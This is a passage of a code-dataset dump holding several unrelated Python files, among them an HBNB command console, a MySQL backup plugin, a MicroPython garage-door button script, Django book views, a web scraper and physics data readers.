def help_show(self):\n \"\"\"Help command for show\"\"\"\n\n msg = \"Prints the string representation of an instance \"\n msg += \"based on the class name and id\\n\"\n print(msg)\n\n def do_destroy(self, arg):\n \"\"\"Deletes an instance based on the class name and id\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n objects = storage.all()\n if len(list_arg) >= 2:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n del objects[clsId]\n storage.save()\n else:\n print(\"** no instance found **\")\n else:\n if len(list_arg) == 1:\n objs_cls = [e.split('.')[0] for e in list(objects.keys())]\n if arg not in objs_cls:\n print(\"** class doesn't exist **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class name missing **\")\n\n def help_destroy(self):\n \"\"\"Help command for destroy\"\"\"\n print(\"Deletes an instance based on the class name and id\\n\")\n\n def do_all(self, arg):\n \"\"\"Prints all string representation of all instances\n based or not on the class name\"\"\"\n\n objects = storage.all()\n if len(arg) > 0:\n list_arg = arg.split()\n clsObjs = [str(v) for k, v in objects.items()\n if list_arg[0] == k.split('.')[0]]\n if len(clsObjs) > 0:\n print(clsObjs)\n else:\n print(\"** class doesn't exist **\")\n else:\n allObjs = [str(v) for k, v in objects.items()]\n print(allObjs)\n\n def help_all(self):\n \"\"\"Help command for all\"\"\"\n\n msg = \"Prints all string representation of all instances \"\n msg += \"based or not on the class name\\n\"\n print(msg)\n\n def do_update(self, arg):\n \"\"\"Updates an instance based on the class name\n and id by adding or updating attribute\"\"\"\n\n if len(arg) > 0:\n objects = storage.all()\n list_arg = split(arg)\n if len(list_arg) == 1:\n clsObjs = [str(v) for k, v in objects.items()\n if arg == k.split('.')[0]]\n if len(clsObjs) > 0:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")\n elif len(list_arg) == 2:\n clsId = '.'.join(list_arg)\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n elif len(list_arg) == 3:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n if list_arg[2]:\n print(\"** value missing **\")\n else:\n print(\"** no instance found **\")\n else:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n if list_arg[2]:\n obj = objects[clsId]\n if HBNBCommand.RepresentsInt(list_arg[3]):\n setattr(obj, list_arg[2], int(list_arg[3]))\n elif HBNBCommand.RepresentsFloat(list_arg[3]):\n setattr(obj, list_arg[2], float(list_arg[3]))\n else:\n setattr(obj, list_arg[2], list_arg[3])\n obj.save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** class name missing **\")\n\n def help_update(self):\n \"\"\"Help command for update\"\"\"\n\n msg = \"Updates an instance based on the class \"\n msg += \"name and id by adding or updating attribute\\n\"\n msg += \"Usage: update \"\n msg += \"\\\"\\\"\\n\"\n print(msg)\n\n @staticmethod\n def RepresentsInt(str):\n try:\n int(str)\n return True\n except ValueError:\n return False\n\n @staticmethod\n def RepresentsFloat(str):\n try:\n float(str)\n return True\n except ValueError:\n return False\n\n\nif __name__ == '__main__':\n HBNBCommand().cmdloop()\n","sub_path":"console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":10240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21118160","text":"#!/usr/bin/env python3\n\"\"\"misqldb plugin for the db wrapper.\n\nConnects to MySQL, reads and extracts tables and performs other operations\nrequired in a backup pr restore operation using the mysql client from\nhttps://pypi.org/project/mysqlclient/.\n\nBearable: Tolerable backup and restore.\nhttps://www.github.com/Effenberg0x0/bearable\n\nAlvaro Leal , 2019\n\"\"\"\nimport MySQLdb\nimport MySQLdb.cursors\n\n\nclass DB(object):\n def __init__(self, profile, connect=False):\n self.profile = profile\n self.connection = None\n if connect:\n self.connect()\n\n def connect(self, no_db=False, reconnect=False):\n \"\"\"\n \"\"\"\n if self.connection is not None:\n if not reconnect:\n raise MySQLdb._exceptions.Error(\"Already connected!\")\n\n if self.profile[\"connection_type\"] == \"local\":\n self.connection = self._connect_local(no_db)\n\n elif self.profile[\"connection_type\"] == \"remote\":\n self.connection = self._connect_remote(no_db)\n\n def _connect_local(self, no_db=False):\n if no_db:\n connection = MySQLdb.connect(user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n )\n\n else:\n connection = MySQLdb.connect(user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n db=self.profile[\"database\"]\n )\n return connection\n\n def _connect_remote(self, no_db=False):\n if no_db:\n connection = MySQLdb.connect(host=self.profile[\"host\"],\n port=self.profile[\"port\"],\n user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n )\n\n else:\n connection = MySQLdb.connect(host=self.profile[\"host\"],\n port=self.profile[\"port\"],\n user=self.profile[\"user\"],\n passwd=self.profile[\"password\"],\n db=self.profile[\"database\"]\n )\n return connection\n\n def list_tables(self):\n if self.connection is None:\n self.connect()\n\n cursor = self.connection.cursor()\n cursor.execute(\"SHOW TABLES\")\n table_list = cursor.fetchall()\n return [table[0] for table in table_list]\n\n def get_table_fields_metadata(self, table):\n if self.connection is None:\n self.connect()\n cursor = self.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\"SHOW FIELDS FROM {0}\".format(table))\n fields_metadata = cursor.fetchall()\n return fields_metadata\n\n def get_table_data(self, table=None):\n if self.connection is None:\n self.connect()\n\n if table is None:\n table_names = self.list_tables()\n else:\n table_names = [table]\n\n tables = []\n if table_names:\n for table_name in table_names:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT * FROM {0};\"\n .format(table_name))\n # tables.append({\"table_name\": table_name,\n # \"data\": cursor.fetchall()})\n tables.append(cursor.fetchall())\n\n return tables\n\n def get_db_data(self):\n if self.connection is None:\n self.connect()\n\n tables_data = []\n # TODO: Implement include_only_tables, exclude_tables logic.\n tables = self.list_tables()\n for table in tables:\n table_dict = {}\n table_metadata = self.get_table_fields_metadata(table)\n table_data = self.get_table_data(table)[0]\n table_dict[\"table_name\"] = table\n table_dict[\"table_fields\"] = table_metadata\n table_dict[\"table_data\"] = table_data\n tables_data.append(table_dict)\n return tables_data\n\n def create_db(self, db_name):\n if self.profile[\"connection_type\"] == \"local\":\n connection = self._connect_local(no_db=True)\n\n elif self.profile[\"connection_type\"] == \"remote\":\n connection = self._connect_remote(no_db=True)\n\n cursor = connection.cursor()\n cursor.execute(\"CREATE DATABASE {0};\".format(db_name))\n\n def create_table(self, table_name, table_fields):\n if self.connection is None:\n self.connect()\n\n fields_string = \"\"\n for i, field in enumerate(table_fields):\n fields_string += \"{0} {1}\".format(field[\"Field\"], field[\"Type\"])\n if i < (len(table_fields) - 1):\n fields_string += \", \"\n\n query_string = \"CREATE TABLE {0} ({1});\".format(table_name,\n fields_string)\n print(query_string)\n cursor = self.connection.cursor()\n cursor.execute(query_string)\n\n def add_to_table(self, table_name, table_data):\n if self.connection is None:\n self.connect()\n\n for row in table_data:\n insert_string = (\"INSERT INTO {0} VALUES {1};\"\n .format(table_name,\n tuple(field for field in row)))\n\n print(insert_string)\n cursor = self.connection.cursor()\n cursor.execute(insert_string)\n","sub_path":"plugins/db/mysqldb/_mysqldb.py","file_name":"_mysqldb.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"74436330","text":"from machine import Pin # for pin read/write\r\nimport machine # for hard resetting after http req\r\nimport network # for wifi conenction\r\nimport urequests # for http request\r\nimport time # for delay in http request and debouncing\r\n\r\ndef onboardledToggle(var):\r\n if var == 'on':\r\n onboardLed(0)\r\n if var == 'off':\r\n onboardLed(1)\r\ndef wait_pin_change(pin):\r\n # wait for pin to change value\r\n # it needs to be stable for a continuous 20ms\r\n cur_value = pin.value()\r\n active = 0\r\n while active < 20:\r\n if pin.value() != cur_value:\r\n active += 1\r\n else:\r\n active = 0\r\n time.sleep_ms(1)\r\n\r\ndef do_connect():\r\n sta = network.WLAN(network.STA_IF)\r\n if not sta.isconnected():\r\n led.value(0)\r\n sta.active(True)\r\n sta.connect('SSID', 'PASSWORD')\r\n while not sta.isconnected():\r\n pass\r\n if sta.isconnected():\r\n led.value(1)\r\n\r\n# Button shield connects pin D0, normally HIGH\r\nbutton = Pin(0, Pin.IN)\r\n# Onboard ESP chip led\r\nonboardLed = Pin(2, Pin.OUT) # define pin and \r\nonboardledToggle('off')\r\n# 5mm led on D1\r\nled = Pin(5, Pin.OUT)\r\n# Prevents spamming of serial\r\npressedMessagePrinted = False\r\nnotPressedMessagePrinted = False\r\n\r\nwhile True:\r\n sta = network.WLAN(network.STA_IF)\r\n if not sta.isconnected():\r\n do_connect()\r\n else:\r\n if button.value(): #button not pressed\r\n if not notPressedMessagePrinted:\r\n print('Button not pressed')\r\n notPressedMessagePrinted = True\r\n pressedMessagePrinted = False\r\n onboardledToggle('off')\r\n \r\n \r\n else: #button pressed\r\n wait_pin_change(button)\r\n if not pressedMessagePrinted: \r\n print('Button pressed')\r\n onboardledToggle('on')\r\n pressedMessagePrinted = True\r\n notPressedMessagePrinted = False\r\n \r\n res = urequests.get(\"http://192.168.1.102/control?cmd=GPIO,5,1\") # garage door relay on\r\n parsedRes1 = res.json()\r\n if parsedRes1['log'] == 'GPIO 5 Set to 1':\r\n urequests.get(\"http://192.168.1.102/control?cmd=GPIO,5,0\")\t# garage door relay off\r\n parsedRes2 = res.json()\r\n if parsedRes1['log'] == 'GPIO 5 Set to 0': #modify to proper key - string -pair to achieve smd led functionality. if not needed just comment those lines.\r\n onboardledToggle('off')\r\n pass\r\n \r\n \r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102069480","text":"import streamlit as st\nfrom src.processing.eda import PlotPairplot, Plot3D\nfrom config import config\n\ndef DataVisualizationBody(df):\n \n st.write(\"## Data Visualization\")\n st.write(\"---\")\n \n st.write(\"#### Pair Plot\")\n PlotPairplot(df,config.ClfIrisSpecies_TARGET)\n\n st.write(\"---\")\n st.write(\"#### 3D Plot\")\n Plot3D(df,config.ClfIrisSpecies_TARGET)\n\n","sub_path":"app_pages/page_data_visualization.py","file_name":"page_data_visualization.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620183128","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Statement: Sorry for this shit code \n@Time : 2020/4/9 17:41\n@Author : Jarvis\n\"\"\"\nimport os\nimport argparse\n\nTRAIN_ERROR_PATH = '/code/errors/train'\nPREDICT_ERROR_PATH = '/code/errors/predict'\nif not os.path.exists(TRAIN_ERROR_PATH):\n os.makedirs(TRAIN_ERROR_PATH)\nif not os.path.exists(PREDICT_ERROR_PATH):\n os.makedirs(PREDICT_ERROR_PATH)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', type=str, help='指定任务的id用于训练')\n parser.add_argument('--predict', type=str, help='指定任务的id用于预测')\n parser.add_argument('--rm-version', type=int, help='删除指定的版本')\n\n args = parser.parse_args()\n if args.train:\n # 模型训练\n task_id = args.train\n os.popen(f\"nohup python /code/base_run.py --train {task_id} > {TRAIN_ERROR_PATH}/{task_id}.out 2>&1 &\")\n\n if args.predict:\n # 模型预测\n task_id = args.predict\n os.popen(f\"nohup python /code/base_run.py --predict {task_id} > {PREDICT_ERROR_PATH}/{task_id}.out 2>&1 &\")\n","sub_path":"run_oil_model.py","file_name":"run_oil_model.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2451027","text":"# coding: utf-8\nfrom datetime import datetime\nimport asyncio\nimport re\n\nfrom w3lib.html import remove_tags\n\nfrom app import config\nfrom app.spider.base import Spider\nfrom app.spider.estate.jd.mixin import JDJudicialSaleConfigMixin\nfrom app.exceptions import ServiceUnavailable\nfrom app.utils.functions import coroutine_wrap\nfrom app.utils.log import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass JDJudicialSaleSpider(Spider, JDJudicialSaleConfigMixin):\n\n async def _crawl_judicial_sale_cases(self, **kwargs):\n try:\n payload_packet = self.get_payload_packet(ptype=self.ptype.LIST, **kwargs)\n except ServiceUnavailable:\n return []\n\n data = await self.fetch(**payload_packet, return_type=dict)\n\n if not self._check_data(data):\n return []\n\n return await self._crawl_all(data, **kwargs)\n\n async def _crawl_all(self, data, **kwargs):\n data_list = data\n\n if len(data_list) == self.PAGE_SIZE: # 相等说明返回的数据是\"满\"的\n concurrent_pages = 5 # 并发爬取的页数\n page = 2 # 从第二页开始, 第一页数据已经有了\n has_more = True # 有更多数据\n while has_more:\n fs = []\n for i in range(concurrent_pages):\n kwargs[\"page\"] = page + i\n payload_packet = self.get_payload_packet(ptype=self.ptype.LIST, **kwargs)\n f = asyncio.ensure_future(self.fetch(**payload_packet, return_type=dict))\n fs.append(f)\n\n for f in asyncio.as_completed(fs):\n result = await f\n if result is None:\n continue\n\n if len(result) != self.PAGE_SIZE:\n has_more = False\n\n data_list.extend(result)\n\n page += concurrent_pages\n\n return data_list\n\n async def _crawl_house_area_unit_price(self, data_list, timeout=None):\n final_data = []\n\n fs = []\n for item in data_list:\n house_area = self._title_contains_house_area(item[\"title\"])\n\n if house_area: # 如果标题里有房屋面积,直接提取。\n del item[\"paimaiId\"]\n item[\"houseArea\"] = house_area\n item[\"unitPrice\"] = round(item[\"totalPrice\"] / house_area * 10000)\n final_data.append(item)\n\n else: # 标题里没有房屋面积就只能发请求\n payload_packet = self.get_payload_packet(ptype=self.ptype.PRODUCT_INFO, paimaiId=item.pop(\"paimaiId\"))\n wrapped_coro = coroutine_wrap(self.fetch(**payload_packet, timeout=timeout, return_type=dict), item)\n f = asyncio.ensure_future(wrapped_coro)\n fs.append(f)\n\n fs2 = []\n for f in asyncio.as_completed(fs):\n result, (item,) = await f\n if result is None:\n final_data.append(item)\n else:\n payload_packet = self.get_payload_packet(ptype=self.ptype.PRODUCT_DESC, **result)\n wrapped_coro = coroutine_wrap(self.fetch(**payload_packet, timeout=timeout, return_type=str), item)\n f2 = asyncio.ensure_future(wrapped_coro)\n fs2.append(f2)\n\n for f in asyncio.as_completed(fs2):\n result, (item,) = await f\n if result:\n house_area = self._parse_house_area(result)\n if house_area:\n item[\"houseArea\"] = house_area\n item[\"unitPrice\"] = round(item[\"totalPrice\"] / house_area * 10000)\n\n final_data.append(item)\n\n return final_data\n\n @staticmethod\n def _check_data(data):\n if data is None: # 请求异常\n return False\n\n if not data: # 空列表,无数据\n return False\n\n return True\n\n async def get_judicial_sale_case(self, **kwargs):\n async with self.aio_session:\n results = await self._crawl_judicial_sale_cases(**kwargs)\n\n if not results:\n return []\n\n keyword = kwargs[\"keyword\"]\n\n data_list = []\n for item in results:\n try:\n title = item[\"title\"]\n if keyword in title:\n data_list.append({\n \"targetUrl\": f\"http://mpaimai.jd.com/{item['id']}\",\n \"cover\": f\"http://img12.360buyimg.com/imgw/s{config.COVER_WIDTH}x{config.COVER_HEIGHT}_{item['productImage']}\",\n \"title\": title[title.find(keyword):],\n \"property\": \"\",\n \"houseType\": \"\",\n \"houseArea\": \"\",\n \"towards\": \"\",\n \"totalPrice\": round(item[\"currentPrice\"] / 10000),\n \"unitPrice\": \"\",\n \"houseStorey\": \"\",\n \"totalStorey\": \"\",\n \"tags\": [],\n \"auctionTime\": datetime.fromtimestamp(item[\"endTime\"] / 1000).strftime(\"%Y-%m-%d\"),\n \"dataSource\": self.data_source,\n\n \"paimaiId\": item[\"id\"], # 详情页ID, 爬房屋面积计算面积均价用\n })\n except Exception as e:\n logger.exception(f\"{e}: {item}\")\n continue\n\n data_list = await self._crawl_house_area_unit_price(data_list)\n\n return data_list\n\n @staticmethod\n def _parse_house_area(text):\n text = remove_tags(text)\n match_obj = re.search(r\"(\\d+(\\.\\d+)?)\\s*[㎡平]\", text) # r\"(\\d+(\\.\\d+)?)(㎡|平方)\"\n if match_obj:\n return float(match_obj.group(1))\n return None\n\n @staticmethod\n def _title_contains_house_area(title):\n match_obj = re.search(r\"(\\d+(\\.\\d+)?)[㎡平]\", title)\n if match_obj:\n return float(match_obj.group(1))\n return None\n","sub_path":"app/spider/estate/jd/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"503034580","text":"import numpy\n\ndef combine_info (fname1, fname2, fname3):\n\n with open(fname1, 'r') as myfile1, open(fname2, 'r') as myfile2:\n \n names = numpy.loadtxt(myfile1, dtype='string')\n emails = numpy.loadtxt(myfile2, dtype='string')\n\n for (item1, item2, item3, item4) in zip(\n names[:,0], names[:,1], names[:,2], emails):\n item1 = item1.replace(\"'\", \"\")\n print (\"{:<{}} {:<{}} {:<{}} {}\\n\".format(\n item1, len(max(names[0], key=len)),\n item2, len(max(names[1], key=len)),\n item3, len(max(names[2], key=len)),\n item4)\n )\n","sub_path":"astr109/combine_names_emails.py","file_name":"combine_names_emails.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"614968222","text":"######################################\n## Read in Scattering Cross Section ##\n######################################\ndef scatter_read_in(file_path,reverse=0):\n ''' read in scattering data base in format given by http://www.nndc.bln.gov/'''\n ''' Input: File path [type=string], Reverse[set to 0 or 1]; Output: Energy [eV], Cosine, Probability '''\n ''' reverse is needed because the database calles a backscatter +1 and a forward scatter -1 and I use a backscatter = -1 and a forward scatter = +1'''\n f = open(file_path,'r')\n raw = f.read().splitlines()\n cosine , probs , energy= [] , [] , []\n index = 1\n while index < len(raw)-2:\n if raw[index][0] == 'I':\n temp = raw[index].split(':')\n temper = temp[1].split('eV')\n energy.append(float(temper[0]))\n index += 3\n new_line = raw[index].split(' ')\n cos , prob = [] , []\n while raw[index] != raw[0] and index < len(raw)-1:\n new_line = raw[index].split(' ')\n cos.append(float(new_line[0]))\n prob.append(float(new_line[1]))\n index += 1\n if reverse == 1: \n cos.reverse()\n cosine.append(cos)\n probs.append(prob)\n else:\n index += 1 \n return energy,cosine,probs\n###################################\n## Read in Elastic Cross Section ##\n###################################\ndef elastic_read_in(file_path):\n ''' Read in database data in format given by http://www.nndc.bnl.gov/ '''\n ''' Input: file_path [type=string]; Output: Energy [eV], Cross Section [b] ''' \n f = open(file_path,'r')\n f = f.read().splitlines()\n f = f[1:]\n Data = []\n for i in f:\n Data.append(i.split(','))\n Data = [[float(i)for i in line] for line in Data]\n Energy = [col[0] for col in Data]\n XC = [col[1] for col in Data]\n return Energy,XC\n","sub_path":"BackEnd/DataBaseReadInFunctions.py","file_name":"DataBaseReadInFunctions.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557300786","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Book\nfrom .forms import BookForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom registro.models import User\nfrom django.http import HttpResponse\nimport logging\nimport jwt, base64\n\n\ndef RedirectLoginToMenu(request):\n\tlogin = request.COOKIES.get('login')\n\tusuario=User.objects.get(login=login)\n\tnome_usuario=usuario.nome \n\treturn render (request,'user_menu.html',{'nome':'nome_usuario'})\n\n\ndef AllBooks(request):\n\tqueryset = Book.objects.all()\n\tAddBookToList(request)\n\tcontext = { \"books_list\":queryset }\n\treturn render(request, 'books_list.html',context)\n\n\n\ndef MyBooks(request):\n\tlogin = request.COOKIES.get('login')\n\tusuario = User.objects.get(login=login).mybooks.all()\n\tRemoveBookFromList(request)\n\tcontext = { \"my_books\":usuario }\n\treturn render(request, 'my_books.html',context)\n\n \n\ndef RegisterBook(request):\n\tif request.method=='POST':\n\t\tnew_book_form = BookForm(request.POST)\n\t\tif new_book_form.is_valid():\n\t\t\tbook = new_book_form.save()\n\t\t\tbook.save()\n\t\t\tlogging.info('livro criado')\n\t\t\treturn redirect( '/lista/')\n\telse:\n\t\tnew_book_form = BookForm()\n\t\treturn render(request,\"new_book.html\",{ 'form':new_book_form})\n\n\ndef AddBookToList(request):\n\tif request.method=='POST':\n\t\tlogin = request.COOKIES['login']\n\t\tbook = request.POST.get('book')\n\t\tusuario = User.objects.get(login=login)\n\t\ttry:\n\t\t\ttemlivro = usuario.mybooks.get(id=book) \n\t\t\tif temlivro.exists():\n\t\t\t\tlogging.info('livro ja esta na sua lista')\n\t\t\t\treturn \n\t\texcept:\n\t\t\tbook_obj = Book.objects.get(id=book)\n\t\t\tusuario = User.objects.get(login=login)\n\t\t\tusuario.mybooks.add(book_obj)\n\t\t\tlogging.info('livro adicionado a sua lista')\n\t\t\tmessages.info(request,'O livro foi adicionado!')\n\t\t\treturn \n\n\telse:\n\t\treturn\n\t\t\n\n\ndef RemoveBookFromList(request):\n\tif request.method=='POST':\n\t\tlogin = request.COOKIES['login']\n\t\tbook = request.POST.get('book')\n\t\tusuario = User.objects.get(login=login)\n\t\tbook_obj = Book.objects.get(id=book)\n\t\tusuario.mybooks.remove(book_obj)\n\t\tlogging.info('livro removido da sua lista')\n\t\tmessages.info(request,'O livro foi removido!')\n\t\treturn \n\n","sub_path":"projeto-django/src/livros/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171109775","text":"class Square:\n def __init__(self, side):\n self.side = side\n self.square = self.side ** 2\n print(self.square)\n \n def __pow__(square1, square2):\n return(square1.square ** square2.square)\n\nsquare1 = Square(3)\nsquare1\nsquare2 = Square(2)\nsquare2\nprint(\"The power of the two squares is {}\".format(square1 ** square2))\n","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136826635","text":"from room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nimport os\nfrom ast import literal_eval\n\nclass Queue():\n def __init__(self):\n self.queue = []\n def enqueue(self, value):\n self.queue.append(value)\n def dequeue(self):\n if self.size() > 0:\n return self.queue.pop(0)\n else:\n return None\n def size(self):\n return len(self.queue)\n\nclass Stack():\n def __init__(self):\n self.stack = []\n def push(self, value):\n self.stack.append(value)\n def pop(self):\n if self.size() > 0:\n return self.stack.pop()\n else:\n return None\n def size(self):\n return len(self.stack)\n\n# Helper funtion\ndef opposite_direction(direction):\n if direction == 'n':\n return 's'\n elif direction == 's':\n return 'n'\n elif direction == 'e':\n return 'w'\n elif direction == 'w':\n return 'e'\n else:\n return None\n\n# Load world\nworld = World()\n\nscript_dir = os.path.dirname(__file__)\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph=literal_eval(open(os.path.join(script_dir, map_file), \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\ntraversal_path = []\n\n# Construct a traversal graph\ntraversal_graph = {}\n# Create a stack and push starting vertex\nstack = Stack()\nstack.push(player.current_room)\n# Create a set of traversed vertices\nvisited = set()\n# Create an array for moving to previous room\nreverse_path = []\n# While stack is not empty\nwhile stack.size() > 0:\n # exit out of the loop if all rooms are visited\n if len(visited) == len(room_graph):\n break\n\n # pop the first vertex\n current_room = stack.pop()\n\n # if current room is already visted, move back\n if current_room.id in visited:\n if len(reverse_path) > 0:\n move_back = reverse_path.pop()\n player.travel(move_back)\n traversal_path.append(move_back)\n # if not visited\n else:\n # push to stack\n stack.push(current_room)\n # Add to traversal graph\n if current_room.id not in traversal_graph:\n traversal_graph[current_room.id] = {}\n for direction in current_room.get_exits():\n traversal_graph[current_room.id][direction] = '?'\n\n # get random direction that has not been visited\n unvisited = []\n for key in traversal_graph[current_room.id]:\n if traversal_graph[current_room.id][key] == '?':\n unvisited.append(key)\n # if all of the directions are visited, append to visited set\n if len(unvisited) == 0:\n visited.add(current_room.id)\n continue\n\n # Move to random direction\n random.shuffle(unvisited)\n player.travel(unvisited[0])\n traversal_path.append(unvisited[0])\n # Update graph\n traversal_graph[current_room.id][unvisited[0]] = player.current_room.id\n if player.current_room.id not in traversal_graph:\n traversal_graph[player.current_room.id] = {}\n for direction in player.current_room.get_exits():\n traversal_graph[player.current_room.id][direction] = '?'\n traversal_graph[player.current_room.id][opposite_direction(unvisited[0])] = current_room.id\n stack.push(player.current_room)\n reverse_path.append(opposite_direction(unvisited[0]))\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n\n","sub_path":"adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"190980279","text":"from django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView\nfrom django.db.models import Count\n\nfrom taggit.models import Tag\n\nfrom .models import Course\n\ndef course_list(request, tag_slug=None):\n object_list = Course.published.all()\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n\n paginator = Paginator(object_list, 9) # 9 courses in each page\n page = request.GET.get('page')\n try:\n courses = paginator.page(page)\n except PageNotAnInteger:\n # if page is not an integer deliver the first page\n courses = paginator.page(1)\n except EmptyPage:\n # if page is out of range deliver last page of results\n courses = paginator.page(paginator.num_pages)\n return render(request, 'course/course/list.html', {'page': page, 'courses': courses, 'tag': tag})\n\nclass CourseListView(ListView):\n queryset = Course.published.all()\n context_object_name = 'courses'\n paginate_by = 9\n template_name = 'course/course/list.html'\n\ndef course_detail(request, course):\n course = get_object_or_404(Course, slug=course, status='published')\n course_videos = course.course_video.all()\n\n # list of similar courses\n course_tags_ids = course.tags.values_list('id', flat=True)\n similar_courses = Course.published.filter(tags__in=course_tags_ids).exclude(id=course.id)\n similar_courses = similar_courses.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publish')[:4]\n\n return render(request, \n 'course/course/detail.html', \n {'course': course, \n 'course_videos': course_videos,\n 'similar_courses': similar_courses})\n\n","sub_path":"course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154025931","text":"#Yelp Call Function\ndef yelp_call(url_params):\n \n response = requests.get(url, headers=headers, params=url_params)\n return response.json()['businesses']\n\n#Data Parsing Function\ndef parse_results(list_of_data):\n # create a container to hold our parsed data\n biz_list = []\n # loop through our business and \n for business in list_of_data:\n # parse each individual business into a tuple\n try:\n biz_tuple = (business['name'],\n business['location']['address1'],\n business['rating'],\n business['price'],\n business['location']['zip_code'],\n business['transactions'],\n business['review_count'],\n business['categories']) \n # add each individual business tuple to our data container\n biz_list.append(biz_tuple)\n except:\n continue\n # return the container with all of the parsed results\n return biz_list\n\n#Saving as CSV Function\ndef df_save(csv_file_path, parsed_results):\n # your code to open the csv file, concat the current data, and save the data. \n business_df = pd.DataFrame(parsed_results, columns = ['Name', 'Location', 'Rating', 'Price', 'Zipcode', 'Transactions', 'Review Count', 'Categories'])\n business_df.to_csv(csv_file_path, mode = 'a')\n new_df = pd.read_csv(csv_file_path, delimiter = \",\")\n return new_df \n","sub_path":"Phase_1/ds-apis_json-main/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355845619","text":"import time\nfrom flask_restful import reqparse, fields, Resource, marshal_with\n\n#请求格式定制\nfrom app.models import Cinema\n\nparser = reqparse.RequestParser()\nparser.add_argument('city', type=str, default='全部')\nparser.add_argument('district', type=str)\nparser.add_argument('sort', type=int, default=1) # 1按分数降序, -1 按分数升序\nparser.add_argument('limit', type=int)\n\ncinemas_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'city': fields.String,\n 'district': fields.String,\n 'address': fields.String,\n 'phone': fields.String,\n 'score': fields.Float,\n 'hallnum': fields.Integer,\n 'servicecharge': fields.Float,\n 'astrict': fields.Integer,\n 'flag': fields.Integer,\n}\n\nresult_fields = {\n 'status': fields.Integer(default=200),\n 